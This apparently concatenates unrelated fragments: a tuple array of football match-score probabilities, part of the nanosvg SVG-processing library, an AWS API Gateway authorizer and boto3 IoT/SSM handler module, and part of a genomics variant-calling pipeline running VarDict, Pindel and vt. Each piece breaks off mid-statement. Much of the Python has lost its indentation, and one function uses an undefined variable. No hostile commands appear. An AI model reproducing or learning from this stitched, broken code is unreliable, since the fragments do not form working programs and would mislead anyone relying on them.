('ARG', 'CRO',0.00815698378544904,0.00550465051097019,0.00259581795201224,0.000832502032788164,0.000201871978554277,0.0168498713008438,0.0165446654254258,0.00812249390965886,0.00265845639126899,0.0457507466592378,0.0449220520991516,0.0220541839440278,0.0931667718334265,0.09147921911272,0.126483143375601,0.0858567128781479,0.12419212299863,0.0449111167253655,0.00721823702329929,0.000652575778715704,3.93211180582245e-05,0.0843015690585522,0.0609713002194491,0.0413872969712928,0.0146992101964642,0.0199556373393677,0.0135458795505951,0.00177187282887329,0.00360823994403933,0.00489854398938996,0.00332512992319545,0.000134548557909756,0.000369820786769461,0.000768569692974187,0.00108627999608777,0.00097898512323376),
('ARG', 'NGA',0.0210307956417515,0.0100562818173815,0.00355486736467795,0.0008530633389551,0.000154664668189825,0.034307373164427,0.0251576655430503,0.0092240832975262,0.00225467959349156,0.0766611086299909,0.0562157446980674,0.0206115591623597,0.128476586101752,0.0942121382412393,0.143542868705688,0.0801879773639838,0.105260273489318,0.0345429749548168,0.00503816588970742,0.000413340266886246,2.25161631852081e-05,0.0588020046136483,0.0385937848217429,0.0215598139537095,0.00844347760280992,0.00943363326917537,0.00526995160309753,0.000923624287672717,0.00154790476476921,0.00172942554873153,0.000966116519788377,6.33580240834779e-05,0.000143153608269417,0.000244373963566119,0.000283191019751221,0.00019894256828114),
('ARG', 'BRA',0.000892954631620695,0.00102671872220525,0.000752679350989002,0.000375460004988526,0.000141641810297664,0.00305127222553313,0.00466254396632122,0.00356233640118427,0.00181449450870132,0.0125586638324953,0.0191904615351148,0.0146621415638906,0.0387674449212905,0.059239196979834,0.0797810343398969,0.0820922484479786,0.12191064998252,0.0452606880069148,0.00746823779602526,0.000693166636581415,4.2926562180514e-05,0.125442336635824,0.0931437321045617,0.0958420564557137,0.0230537660119041,0.0474432426896821,0.0488176481827268,0.00285298922065415,0.00880691640033887,0.0181240961634324,0.0186491415842612,0.00022270806333958,0.000928223644040323,0.00292579180723905,0.00627522600487472,0.00952026756238919),
('ARG', | |
<gh_stars>0
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import dataclasses
from functools import reduce
from lxml import etree # pytype: disable=import-error
import re
from typing import List, Optional, Tuple
from nanosvg.svg_meta import ntos, svgns, xlinkns
from nanosvg import svg_pathops
from nanosvg.svg_types import *
import numbers
# Map of SVG basic-shape tag names to the nanosvg dataclasses that model them.
_ELEMENT_CLASSES = {
    "circle": SVGCircle,
    "ellipse": SVGEllipse,
    "line": SVGLine,
    "path": SVGPath,
    "polygon": SVGPolygon,
    "polyline": SVGPolyline,
    "rect": SVGRect,
}
# Reverse lookup: shape dataclass -> fully namespace-qualified element tag.
_CLASS_ELEMENTS = {v: f"{{{svgns()}}}{k}" for k, v in _ELEMENT_CLASSES.items()}
# Also register namespace-qualified tags so lookups work on parsed lxml tags.
_ELEMENT_CLASSES.update({f"{{{svgns()}}}{k}": v for k, v in _ELEMENT_CLASSES.items()})
# Placeholder attribute name used for xlink:href while the xlink namespace
# may not yet be declared on the tree; rewritten by _fix_xlink_ns.
_XLINK_TEMP = "xlink_"
# How much error, as pct of viewbox max(w,h), is allowed on lossy ops
# For example, for a Noto Emoji with a viewBox 0 0 128 128 permit error of 0.128
_MAX_PCT_ERROR = 0.1
# When you have no viewbox, use this. Absolute value in svg units.
_DEFAULT_DEFAULT_TOLERENCE = 0.1
def _xlink_href_attr_name() -> str:
    """Return the fully namespace-qualified name of the xlink:href attribute."""
    ns = xlinkns()
    return "{%s}href" % ns
def _copy_new_nsmap(tree, nsm):
    """Clone *tree* with namespace map *nsm*.

    lxml cannot change an element's nsmap in place, so we build a fresh root
    and adopt the original's attributes and children.
    """
    replacement = etree.Element(tree.tag, nsmap=nsm)
    replacement.attrib.update(tree.attrib)
    replacement[:] = tree[:]
    return replacement
def _fix_xlink_ns(tree):
    """Fix xlink namespace problems.

    If temporary xlink placeholders are present, declare the namespace and
    rewrite them to real xlink:href attributes. If xlink is declared but
    nothing references it, drop the declaration.
    """
    if "xlink" in tree.nsmap:
        # Declared: keep it only if some element actually uses xlink:href.
        used = tree.xpath("//*[@xlink:href]", namespaces={"xlink": xlinkns()})
        if not used:
            nsm = dict(tree.nsmap)
            del nsm["xlink"]
            tree = _copy_new_nsmap(tree, nsm)
    elif tree.xpath(f"//*[@{_XLINK_TEMP}]"):
        # Not declared but placeholders exist: declare xlink and fix temps.
        nsm = dict(tree.nsmap)
        nsm["xlink"] = xlinkns()
        tree = _copy_new_nsmap(tree, nsm)
        for el in tree.xpath(f"//*[@{_XLINK_TEMP}]"):
            # Rebuild the attribute dict so attribute order is retained;
            # shuffled attributes are unexpected for downstream readers.
            pairs = list(el.attrib.items())
            el.attrib.clear()
            for name, value in pairs:
                if name == _XLINK_TEMP:
                    name = _xlink_href_attr_name()
                el.attrib[name] = value
    return tree
def _del_attrs(el, *attr_names):
    """Remove each of *attr_names* from el.attrib, ignoring missing names."""
    for attr in attr_names:
        el.attrib.pop(attr, None)
def _attr_name(field_name):
return field_name.replace("_", "-")
def _field_name(attr_name):
return attr_name.replace("-", "_")
def from_element(el):
if el.tag not in _ELEMENT_CLASSES:
raise ValueError(f"Bad tag <{el.tag}>")
data_type = _ELEMENT_CLASSES[el.tag]
args = {
f.name: f.type(el.attrib[_attr_name(f.name)])
for f in dataclasses.fields(data_type)
if _attr_name(f.name) in el.attrib
}
return data_type(**args)
def to_element(data_obj):
el = etree.Element(_CLASS_ELEMENTS[type(data_obj)])
data = dataclasses.asdict(data_obj)
for field in dataclasses.fields(data_obj):
field_value = data[field.name]
if field_value == field.default:
continue
attrib_value = field_value
if isinstance(attrib_value, numbers.Number):
attrib_value = ntos(attrib_value)
el.attrib[_attr_name(field.name)] = attrib_value
return el
def _reset_attrs(data_obj, field_pred):
for field in dataclasses.fields(data_obj):
if field_pred(field):
setattr(data_obj, field.name, field.default)
class SVG:
svg_root: etree.Element
elements: List[Tuple[etree.Element, Tuple[SVGShape, ...]]]
def __init__(self, svg_root):
self.svg_root = svg_root
self.elements = []
def _elements(self) -> List[Tuple[etree.Element, Tuple[SVGShape, ...]]]:
if self.elements:
return self.elements
elements = []
for el in self.svg_root.iter("*"):
if el.tag not in _ELEMENT_CLASSES:
continue
elements.append((el, (from_element(el),)))
self.elements = elements
return self.elements
def _set_element(self, idx: int, el: etree.Element, shapes: Tuple[SVGShape, ...]):
self.elements[idx] = (el, shapes)
def view_box(self) -> Optional[Rect]:
raw_box = self.svg_root.attrib.get("viewBox", None)
if not raw_box:
return None
box = tuple(int(v) for v in re.split(r",|\s+", raw_box))
if len(box) != 4:
raise ValueError("Unable to parse viewBox")
return Rect(*box)
def _default_tolerance(self):
vbox = self.view_box()
# Absence of viewBox is unusual
if vbox is None:
return _DEFAULT_DEFAULT_TOLERENCE
return min(vbox.w, vbox.h) * _MAX_PCT_ERROR / 100
@property
def tolerance(self):
return self._default_tolerance()
def shapes(self):
return tuple(shape for (_, shapes) in self._elements() for shape in shapes)
def absolute(self, inplace=False):
"""Converts all basic shapes to their equivalent path."""
if not inplace:
svg = SVG(copy.deepcopy(self.svg_root))
svg.absolute(inplace=True)
return svg
swaps = []
for idx, (el, (shape,)) in enumerate(self._elements()):
self.elements[idx] = (el, (shape.absolute(),))
return self
def shapes_to_paths(self, inplace=False):
"""Converts all basic shapes to their equivalent path."""
if not inplace:
svg = SVG(copy.deepcopy(self.svg_root))
svg.shapes_to_paths(inplace=True)
return svg
tolerance = self.tolerance
swaps = []
for idx, (el, (shape,)) in enumerate(self._elements()):
self.elements[idx] = (el, (shape.as_path(tolerance),))
return self
def _xpath(self, xpath, el=None):
if el is None:
el = self.svg_root
return el.xpath(xpath, namespaces={"svg": svgns()})
def _xpath_one(self, xpath):
els = self._xpath(xpath)
if len(els) != 1:
raise ValueError(f"Need exactly 1 match for {xpath}, got {len(els)}")
return els[0]
def resolve_url(self, url, el_tag):
match = re.match(r"^url[(]#([\w-]+)[)]$", url)
if not match:
raise ValueError(f'Unrecognized url "{url}"')
return self._xpath_one(f'//svg:{el_tag}[@id="{match.group(1)}"]')
def _resolve_use(self, scope_el):
attrib_not_copied = {"x", "y", "width", "height", _xlink_href_attr_name()}
swaps = []
for use_el in self._xpath(".//svg:use", el=scope_el):
ref = use_el.attrib.get(_xlink_href_attr_name(), "")
if not ref.startswith("#"):
raise ValueError("Only use #fragment supported")
target = self._xpath_one(f'//svg:*[@id="{ref[1:]}"]')
new_el = copy.deepcopy(target)
group = etree.Element("g")
use_x = use_el.attrib.get("x", 0)
use_y = use_el.attrib.get("y", 0)
if use_x != 0 or use_y != 0:
group.attrib["transform"] = (
group.attrib.get("transform", "") + f" translate({use_x}, {use_y})"
).strip()
for attr_name in use_el.attrib:
if attr_name in attrib_not_copied:
continue
group.attrib[attr_name] = use_el.attrib[attr_name]
if len(group.attrib):
group.append(new_el)
swaps.append((use_el, group))
else:
swaps.append((use_el, new_el))
for old_el, new_el in swaps:
old_el.getparent().replace(old_el, new_el)
def resolve_use(self, inplace=False):
"""Instantiate reused elements.
https://www.w3.org/TR/SVG11/struct.html#UseElement"""
if not inplace:
svg = SVG(copy.deepcopy(self.svg_root))
svg.resolve_use(inplace=True)
return svg
self._update_etree()
self._resolve_use(self.svg_root)
return self
def _resolve_clip_path(self, clip_path_url):
clip_path_el = self.resolve_url(clip_path_url, "clipPath")
self._resolve_use(clip_path_el)
self._ungroup(clip_path_el)
# union all the shapes under the clipPath
# Fails if there are any non-shapes under clipPath
clip_path = svg_pathops.union(
self.tolerance, *[from_element(e) for e in clip_path_el]
)
return clip_path
def _combine_clip_paths(self, clip_paths):
# multiple clip paths leave behind their intersection
if len(clip_paths) > 1:
return svg_pathops.intersection(self.tolerance, *clip_paths)
elif clip_paths:
return clip_paths[0]
return None
def _new_id(self, tag, template):
for i in range(100):
potential_id = template % i
existing = self._xpath(f'//svg:{tag}[@id="{potential_id}"]')
if not existing:
return potential_id
raise ValueError(f"No free id for {template}")
def _inherit_group_attrib(self, group, child):
def _inherit_copy(attrib, child, attr_name):
child.attrib[attr_name] = child.attrib.get(attr_name, attrib[attr_name])
def _inherit_multiply(attrib, child, attr_name):
value = float(attrib[attr_name])
value *= float(child.attrib.get(attr_name, 1.0))
child.attrib[attr_name] = ntos(value)
def _inherit_clip_path(attrib, child, attr_name):
clips = sorted(
child.attrib.get("clip-path", "").split(",") + [attrib.get("clip-path")]
)
child.attrib["clip-path"] = ",".join([c for c in clips if c])
attrib_handlers = {
"fill": _inherit_copy,
"stroke": _inherit_copy,
"stroke-width": _inherit_copy,
"stroke-linecap": _inherit_copy,
"stroke-linejoin": _inherit_copy,
"stroke-miterlimit": _inherit_copy,
"stroke-dasharray": _inherit_copy,
"fill-opacity": _inherit_multiply,
"opacity": _inherit_multiply,
"clip-path": _inherit_clip_path,
}
attrib = copy.deepcopy(group.attrib)
for attr_name in sorted(attrib.keys()):
if not attr_name in attrib_handlers:
continue
attrib_handlers[attr_name](attrib, child, attr_name)
del attrib[attr_name]
if attrib:
raise ValueError(f"Unable to process group attrib {attrib}")
def _ungroup(self, scope_el):
"""Push inherited attributes from group down, then remove the group.
If result has multiple clip paths merge them.
"""
groups = [e for e in self._xpath(f".//svg:g", scope_el)]
multi_clips = []
for group in groups:
# move groups children up
for child in group:
group.remove(child)
group.addnext(child)
self._inherit_group_attrib(group, child)
if "," in child.attrib.get("clip-path", ""):
multi_clips.append(child)
# nuke the groups
for group in groups:
if group.getparent() is not None:
group.getparent().remove(group)
# if we have new combinations of clip paths materialize them
new_clip_paths = {}
old_clip_paths = []
for clipped_el in multi_clips:
clip_refs = clipped_el.attrib["clip-path"]
if clip_refs not in new_clip_paths:
clip_ref_urls = clip_refs.split(",")
old_clip_paths.extend(
[self.resolve_url(ref, "clipPath") for ref in clip_ref_urls]
)
clip_paths = [self._resolve_clip_path(ref) for ref in clip_ref_urls]
clip_path = self._combine_clip_paths(clip_paths)
new_el = etree.SubElement(self.svg_root, "clipPath")
new_el.attrib["id"] = self._new_id("clipPath", "merged-clip-%d")
new_el.append(to_element(clip_path))
new_clip_paths[clip_refs] = new_el
new_ref_id = new_clip_paths[clip_refs].attrib["id"]
clipped_el.attrib["clip-path"] = f"url(#{new_ref_id})"
# destroy unreferenced clip paths
for old_clip_path in old_clip_paths:
if old_clip_path.getparent() is None:
continue
old_id = old_clip_path.attrib["id"]
if not self._xpath(f'//svg:*[@clip-path="url(#{old_id})"]'):
old_clip_path.getparent().remove(old_clip_path)
def _compute_clip_path(self, el):
"""Resolve clip path for element, including inherited clipping.
None if there is no clipping.
https://www.w3.org/TR/SVG11/masking.html#EstablishingANewClippingPath
"""
clip_paths = []
while el is not None:
clip_url = el.attrib.get("clip-path", None)
if clip_url:
clip_paths.append(self._resolve_clip_path(clip_url))
el = el.getparent()
return self._combine_clip_paths(clip_paths)
def ungroup(self, inplace=False):
if not inplace:
svg = SVG(copy.deepcopy(self.svg_root))
svg.ungroup(inplace=True)
return svg
self._update_etree()
self._ungroup(self.svg_root)
return self
def _stroke(self, shape):
"""Convert stroke to path.
Returns sequence of shapes in draw order. That is, result[1] should be
drawn on top of result[0], etc."""
def stroke_pred(field):
return field.name.startswith("stroke")
# map old fields to new dest
_stroke_fields = {
"stroke": "fill",
"stroke_opacity": "opacity",
}
if shape.stroke == "none":
return (shape,)
# make a new path that is the stroke
stroke = svg_pathops.stroke(shape, self.tolerance)
# convert some stroke attrs (e.g. stroke => fill)
for field in dataclasses.fields(shape):
dest_field = _stroke_fields.get(field.name, None)
if not dest_field:
continue
setattr(stroke, dest_field, getattr(shape, field.name))
| |
import json
import traceback
import boto3
from botocore.exceptions import ClientError
import re
import requests
from .exceptions import IoTBotoError, QueryError, ThingNotExists
from .utils import Logger, HttpVerb
from settings.aws import USER_POOL_ID
project_logger = Logger()
logger = project_logger.get_logger()
class Session:
def __init__(self):
self._user_session = boto3.session.Session()
self.user_region = self._user_session.region_name
class Sts(Session):
def __init__(self):
Session.__init__(self)
self._account_client = boto3.client("sts")
self.account_id = self._account_client.get_caller_identity()["Account"]
class IamAuthPolicyHandler(object):
aws_account_id = ""
"""
The AWS account id the policy will be generated for. This is used to create the method ARNs.
"""
principal_id = ""
"""
The principal used for the policy, this should be a unique identifier for the end user.
"""
version = "2012-10-17"
"""
The policy version used for the evaluation. This should always be '2012-10-17'
"""
path_regex = "^[/.a-zA-Z0-9-\*]+$"
"""
The regular expression used to validate resource paths for the policy.
"""
"""
These are the internal lists of allowed and denied methods. These are lists
of objects and each object has 2 properties: A resource ARN and a nullable
conditions statement.
The build method processes these lists and generates the approriate
statements for the final policy.
"""
allow_methods = []
deny_methods = []
rest_api_id = "*"
"""
The API Gateway API id. By default this is set to '*'
"""
region = "*"
"""
The region where the API is deployed. By default this is set to '*'
"""
stage = "*"
"""
The name of the stage used in the policy. By default this is set to '*'
"""
def __init__(self):
"""
Class that manages the creation of AWS IAM Policies for API Gateway Lambda Authorizers.
"""
"""
The AWS account id the policy will be generated for. This is used to create the method ARNs.
"""
self.aws_account_id = None
"""
The principal used for the policy, this should be a unique identifier for the end user.
"""
self.principal_id = None
"""
The policy version used for the evaluation. This should always be '2012-10-17'
"""
self.version = "2012-10-17"
"""
The regular expression used to validate resource paths for the policy.
"""
self.path_regex = "^[/.a-zA-Z0-9-\*]+$"
"""
The API Gateway API id. By default this is set to '*'
"""
self.rest_api_id = "*"
"""
The region where the API is deployed. By default this is set to '*'
"""
self.region = "*"
"""
The name of the stage used in the policy. By default this is set to '*'
"""
self.stage = "*"
"""
These are the internal lists of allowed and denied methods. These are lists
of objects and each object has 2 properties: A resource ARN and a nullable
conditions statement.
The build method processes these lists and generates the approriate
statements for the final policy.
"""
self.allow_methods = []
self.deny_methods = []
def populate(self, aws_account_id, principal_id):
self.aws_account_id = aws_account_id
self.principal_id = principal_id
def _add_method(self, effect, verb, resource, conditions):
"""Adds a method to the internal lists of allowed or denied methods. Each object in
the internal list contains a resource ARN and a condition statement. The condition
statement can be null."""
if verb != "*" and not hasattr(HttpVerb, verb):
raise NameError("Invalid HTTP verb " + verb + ". Allowed verbs in HttpVerb class")
resource_pattern = re.compile(self.path_regex)
if not resource_pattern.match(resource):
raise NameError("Invalid resource path: " + resource + ". Path should match " + self.path_regex)
if resource[:1] == "/":
resource = resource[1:]
resource_arn = (
"arn:aws:execute-api:"
+ self.region
+ ":"
+ self.aws_account_id
+ ":"
+ self.rest_api_id
+ "/"
+ self.stage
+ "/"
+ verb
+ "/"
+ resource
)
if effect.lower() == "allow":
self.allow_methods.append({"resourceArn": resource_arn, "conditions": conditions})
elif effect.lower() == "deny":
self.deny_methods.append({"resourceArn": resource_arn, "conditions": conditions})
@staticmethod
def _get_empty_statement(effect):
"""
Returns an empty statement object prepopulated with the correct action and the
desired effect.
"""
statement = {"Action": "execute-api:Invoke", "Effect": effect[:1].upper() + effect[1:].lower(), "Resource": []}
return statement
def _get_statement_for_effect(self, effect, methods):
"""T
his function loops over an array of objects containing a resourceArn and
conditions statement and generates the array of statements for the policy.
"""
statements = []
if len(methods) > 0:
statement = self._get_empty_statement(effect)
for curMethod in methods:
if curMethod["conditions"] is None or len(curMethod["conditions"]) == 0:
statement["Resource"].append(curMethod["resourceArn"])
else:
conditional_statement = self._get_empty_statement(effect)
conditional_statement["Resource"].append(curMethod["resourceArn"])
conditional_statement["Condition"] = curMethod["conditions"]
statements.append(conditional_statement)
statements.append(statement)
return statements
def allow_all_methods(self):
"""
Adds a '*' allow to the policy to authorize access to all methods of an API
"""
self._add_method("Allow", HttpVerb.ALL, "*", [])
def deny_all_methods(self):
"""
Adds a '*' allow to the policy to deny access to all methods of an API
"""
self._add_method("Deny", HttpVerb.ALL, "*", [])
def allow_method(self, verb, resource):
"""
Adds an API Gateway method (Http verb + Resource path) to the list of allowed
methods for the policy
"""
self._add_method("Allow", verb, resource, [])
def deny_method(self, verb, resource):
"""
Adds an API Gateway method (Http verb + Resource path) to the list of denied
methods for the policy
"""
self._add_method("Deny", verb, resource, [])
def allow_method_with_conditions(self, verb, resource, conditions):
"""
Adds an API Gateway method (Http verb + Resource path) to the list of allowed
methods and includes a condition for the policy statement. More on AWS policy
conditions here: http://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements.html#Condition
"""
self._add_method("Allow", verb, resource, conditions)
def deny_method_with_conditions(self, verb, resource, conditions):
"""
Adds an API Gateway method (Http verb + Resource path) to the list of denied
methods and includes a condition for the policy statement. More on AWS policy
conditions here: http://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements.html#Condition
"""
self._add_method("Deny", verb, resource, conditions)
def build(self):
"""
Generates the policy document based on the internal lists of allowed and denied
conditions. This will generate a policy with two main statements for the effect:
one statement for Allow and one statement for Deny.
Methods that includes conditions will have their own statement in the policy.
"""
if (self.allow_methods is None or len(self.allow_methods) == 0) and (
self.deny_methods is None or len(self.deny_methods) == 0
):
raise NameError("No statements defined for the policy")
policy = {"principalId": self.principal_id, "policyDocument": {"Version": self.version, "Statement": []}}
policy["policyDocument"]["Statement"].extend(self._get_statement_for_effect("Allow", self.allow_methods))
policy["policyDocument"]["Statement"].extend(self._get_statement_for_effect("Deny", self.deny_methods))
return policy
class ConfigurationHandler(Sts):
    """
    Handles the boto3 calls for SSM (Parameter Store) configuration.
    """

    def __init__(self, path: str):
        """Create the SSM client and remember the parameter path to read.

        :param path: SSM parameter-store path to load configuration from.
        """
        Sts.__init__(self)
        self.ssm_client = boto3.client("ssm")
        self.path = path
        # Populated by get_config(); stays None until a parameter is parsed.
        self.configuration = None

    def get_config(self):
        """Load configuration from SSM parameters under ``self.path``.

        Each parameter's value is expected to be a JSON document. Note that
        when several parameters are returned, the last one wins (existing
        behavior, preserved).

        :returns: the parsed configuration dict, or None when nothing loaded.
        """
        try:
            parameter_details = self.ssm_client.get_parameters_by_path(Path=self.path, Recursive=False)
            logger.info(parameter_details)
            if "Parameters" in parameter_details and len(parameter_details.get("Parameters")) > 0:
                for param in parameter_details.get("Parameters"):
                    config_values = json.loads(param.get("Value"))
                    self.configuration = config_values
        except Exception:
            logger.error("Encountered an error loading config from SSM.")
            # BUG FIX: traceback.print_exc() prints to stderr and returns
            # None, so the previous logger.error(traceback.print_exc())
            # always logged "None". format_exc() returns the traceback text.
            logger.error(traceback.format_exc())
        finally:
            logger.info(self.configuration)
        return self.configuration
class ThingHandler(Sts):
"""
Handles the boto3 calls for thing management. Includes Things, Thing Types, Policies, Certificates and Thing
Indexing.
"""
def __init__(self):
    """Initialise shared STS base state and create the boto3 IoT client."""
    Sts.__init__(self)
    self.iot_client = boto3.client("iot")
def attach_policy_(self, policy_name: str, certificate_arn: str):
    """Attach an existing IoT policy to a certificate.

    :param policy_name: name of the IoT policy to attach.
    :param certificate_arn: ARN of the certificate (the policy target).
    :raises IoTBotoError: on a boto3 ClientError.
    :raises RuntimeError: on any other unexpected failure.
    """
    logger.info("Attaching IoT policy...")
    try:
        # attach_policy returns no payload we use; the old unused
        # `response =` binding is dropped.
        self.iot_client.attach_policy(policyName=policy_name, target=certificate_arn)
    except ClientError as err:
        logger.error("Boto3 error... Unable to attach policy!")
        logger.error(traceback.format_exc())
        # Chain the original error so the cause survives in tracebacks.
        raise IoTBotoError from err
    except Exception as err:
        logger.error("Unexpected error...")
        logger.error(traceback.format_exc())
        raise RuntimeError from err
def attach_thing_principal_(self, thing_name: str, certificate_arn: str):
    """Attach an IoT thing to its principal (a certificate).

    :param thing_name: name of the IoT thing.
    :param certificate_arn: ARN of the certificate acting as principal.
    :raises IoTBotoError: on a boto3 ClientError.
    :raises RuntimeError: on any other unexpected failure.
    """
    logger.info("Attaching IoT thing principal...")
    try:
        # attach_thing_principal returns no payload we use; the old unused
        # `response =` binding is dropped.
        self.iot_client.attach_thing_principal(thingName=thing_name, principal=certificate_arn)
    except ClientError as err:
        logger.error("Boto3 error... Unable to attach thing to its principal!")
        logger.error(traceback.format_exc())
        # Chain the original error so the cause survives in tracebacks.
        raise IoTBotoError from err
    except Exception as err:
        logger.error("Unexpected error...")
        logger.error(traceback.format_exc())
        raise RuntimeError from err
def create_thing_(self, thing_name: str, thing_type: str, thing_attributes: dict):
    """Create an IoT thing with the given type and attribute payload.

    :param thing_name: name for the new thing.
    :param thing_type: existing thing-type name.
    :param thing_attributes: attributes dict wrapped into attributePayload.
    :raises IoTBotoError: on a boto3 ClientError.
    :raises RuntimeError: on any other unexpected failure.
    """
    logger.info("Creating thing...")
    try:
        # create_thing's response is not used by callers; the old unused
        # `response =` binding is dropped.
        self.iot_client.create_thing(
            thingName=thing_name, thingTypeName=thing_type, attributePayload={"attributes": thing_attributes},
        )
    except ClientError as err:
        logger.error("Boto3 error... Unable to create thing!")
        logger.error(traceback.format_exc())
        # Chain the original error so the cause survives in tracebacks.
        raise IoTBotoError from err
    except Exception as err:
        logger.error("Unexpected error...")
        logger.error(traceback.format_exc())
        raise RuntimeError from err
def describe_thing_(self, thing_name: str) -> dict:
    """Describe an IoT thing and return a trimmed summary dict.

    :param thing_name: name of the thing to describe.
    :returns: dict with thing_arn, thing_name, thing_type_name, attributes
        and version extracted from the describe_thing response.
    :raises ThingNotExists: on a boto3 ClientError (typically: no such thing).
    :raises RuntimeError: on any other unexpected failure — note a response
        missing "thingTypeName" lands here via KeyError.
    """
    logger.info("Describing thing...")
    try:
        response = self.iot_client.describe_thing(thingName=thing_name)
        thing_data = {
            "thing_arn": response["thingArn"],
            "thing_name": response["thingName"],
            "thing_type_name": response["thingTypeName"],
            "attributes": response["attributes"],
            "version": response["version"],
        }
    except ClientError as err:
        logger.error("Boto3 error... Probably thing does not exist!")
        # Chain the original error so the cause survives in tracebacks.
        raise ThingNotExists from err
    except Exception as err:
        logger.error("Unexpected error...")
        logger.error(traceback.format_exc())
        raise RuntimeError from err
    else:
        return thing_data
def get_preconfigured_policy(self, policy_name: str) -> str:
    """Return the ARN of an existing (preconfigured) IoT policy.

    BUG FIX: the return annotation previously claimed ``dict``, but the
    method has always returned ``["policyArn"]`` — a string. The local is
    renamed accordingly; runtime behavior is unchanged.

    :param policy_name: name of the policy to look up.
    :returns: the policy ARN string.
    :raises IoTBotoError: on a boto3 ClientError.
    :raises RuntimeError: on any other unexpected failure.
    """
    logger.info("Getting preconfigured policy...")
    try:
        policy_arn = self.iot_client.get_policy(policyName=policy_name)["policyArn"]
    except ClientError as err:
        logger.error(traceback.format_exc())
        raise IoTBotoError from err
    except Exception as err:
        logger.error("Unexpected error...")
        logger.error(traceback.format_exc())
        raise RuntimeError from err
    else:
        return policy_arn
@staticmethod
def get_root_ca(preferred_endpoint: str, backup_endpoint: str):
    """Download the root CA from the preferred endpoint, falling back to the
    backup endpoint on any failure.

    :returns: the response body text on HTTP 200, otherwise False.
    """
    try:
        resp = requests.get(url=preferred_endpoint)
        resp.raise_for_status()
    except Exception:
        logger.error("Using backup certficate endpoint...")
        logger.error(traceback.format_exc())
        resp = requests.get(url=backup_endpoint)
    return resp.text if resp.status_code == 200 else False
def get_thing_types_by_prefix(self, partial_name: str):
thing_types = list()
response = self.iot_client.list_thing_types(maxResults=10)
thing_types.extend(response["thingTypes"])
next_token = response.get("nextToken")
while next_token is not None:
try:
next_token = response.get("nextToken")
if next_token is None:
response = | |
call somatic variants
:param config: The configuration dictionary.
:type config: dict.
:param sample: sample name.
:type sample: str.
:param input_bam: The input_bam file name to process.
:type input_bam: str.
:returns: str -- The output vcf file name.
"""
vardict_vcf = "{}.vardict.vcf".format(name)
logfile = "{}.vardict.log".format(name)
vardict = ["{}".format(config['vardict']['bin']),
"-G",
"{}".format(config['reference']),
"-z",
"-c",
"1",
"-S",
"2",
"-E",
"3",
"-g",
"4",
"-B",
"{}".format(config['vardict']['num_cores']),
# "-a", the amplicon flag seems to be creating errors
# "-F 0", Probably don't need this as duplicates aren't marked and ignoring secondary alignment good
"-f",
"{}".format(config['min_alt_af']),
"-N",
"{}".format(name),
"-b",
"{}".format(input_bam),
"{}".format(samples[name]['regions'])]
vardict2vcf = ["{}".format(config['vardict2vcf']['bin']),
"-E",
"-f",
"{}".format(config['min_alt_af']),
"-N",
"{}".format(name)]
vcfsort = ["{}".format(config['vcftools_sort']['bin']),
"-c"]
command = ("{vardict} | {strandbias} | {vardict2vcf} | "
"{sort} > {vcf}".format(vardict=" ".join(vardict), strandbias=config['vardict_strandbias']['bin'],
vardict2vcf=" ".join(vardict2vcf), sort=" ".join(vcfsort), vcf=vardict_vcf))
job.fileStore.logToMaster("VarDict Command: {}\n".format(command))
run_and_log_command(command, logfile)
return vardict_vcf
def run_pindel(job, config, name, input_bam):
    """Run the Pindel caller for InDel detection, then convert to VCF.

    :param job: Toil job handle (used for logging to the master).
    :param config: The configuration dictionary.
    :type config: dict.
    :param name: sample name.
    :type name: str.
    :param input_bam: The input_bam file name to process.
    :type input_bam: str.
    :returns: str -- The output vcf file name.
    """
    pindel_config = "{}.pindel_config.txt".format(name)
    output_dir = "{}_pindel".format(name)
    output_vcf = "{}.pindel.vcf".format(name)
    logfile = "{}.pindel.log".format(name)
    vcf_logfile = "{}.pindel2vcf.log".format(name)

    # Pindel reads BAM inputs from a small config file:
    # "<bam> <insert size> <sample name>" per line.
    with open(pindel_config, 'w') as bam_config:
        bam_config.write("%s %s %s\n" % (input_bam, config['insert_size'], name))

    command = (str(config['pindel']['bin']),
               "-f", str(config['reference']),
               "-c", "ALL",
               "-w", str(config['pindel']['window']),
               "-E", str(config['pindel']['sensitivity']),
               "-T", str(config['pindel']['num_cores']),
               "-o", output_dir,
               "-i", pindel_config)

    pindel2vcf_command = (str(config['pindel2vcf']['bin']),
                          "-r", str(config['reference']),
                          "-R", str(config['snpeff']['reference']),
                          "-d", str(config['snpeff']['reference']),
                          "-he", "0.01",
                          "-G",
                          "-P", output_dir,
                          "-v", output_vcf)

    job.fileStore.logToMaster("Pindel Command: {}\n".format(command))
    run_and_log_command(" ".join(command), logfile)

    job.fileStore.logToMaster("Pindel2vcf Command: {}\n".format(pindel2vcf_command))
    run_and_log_command(" ".join(pindel2vcf_command), vcf_logfile)

    return output_vcf
def vt_normalization(job, config, sample, caller, input_vcf):
    """Decompose multi-allelic records and left-normalize variants with vt.

    :param config: The configuration dictionary.
    :type config: dict.
    :param sample: sample name.
    :type sample: str.
    :param caller: caller name (used in the output file name).
    :type caller: str.
    :param input_vcf: The input_vcf file name to process.
    :type input_vcf: str.
    :returns: str -- The output vcf file name.
    """
    output_vcf = "{}.{}.normalized.vcf".format(sample, caller)
    logfile = "{}.{}.vt_normalization.log".format(sample, caller)

    vt_bin = str(config['vt']['bin'])
    # Shell pipeline: zless | sed (fix the AD Number field to 'R' so vt
    # decompose handles allele-depth correctly) | vt decompose | vt normalize.
    pipeline = ["zless", str(input_vcf), "|",
                "sed", "'s/ID=AD,Number=./ID=AD,Number=R/'", "|",
                vt_bin, "decompose", "-s", "-", "|",
                vt_bin, "normalize", "-r", str(config['reference']), "-",
                ">", output_vcf]

    job.fileStore.logToMaster("VT Command: {}\n".format(pipeline))
    run_and_log_command(" ".join(pipeline), logfile)

    return output_vcf
def merge_variant_calls(job, config, sample, callers, vcf_files):
    """Merge variant calls from multiple variant callers into one sorted VCF.

    :param config: The configuration dictionary.
    :type config: dict.
    :param sample: sample name.
    :type sample: str.
    :param callers: Comma-separated list of VCF callers to tag the ensemble
        output. Must be in same order as vcf_files.
    :type callers: str.
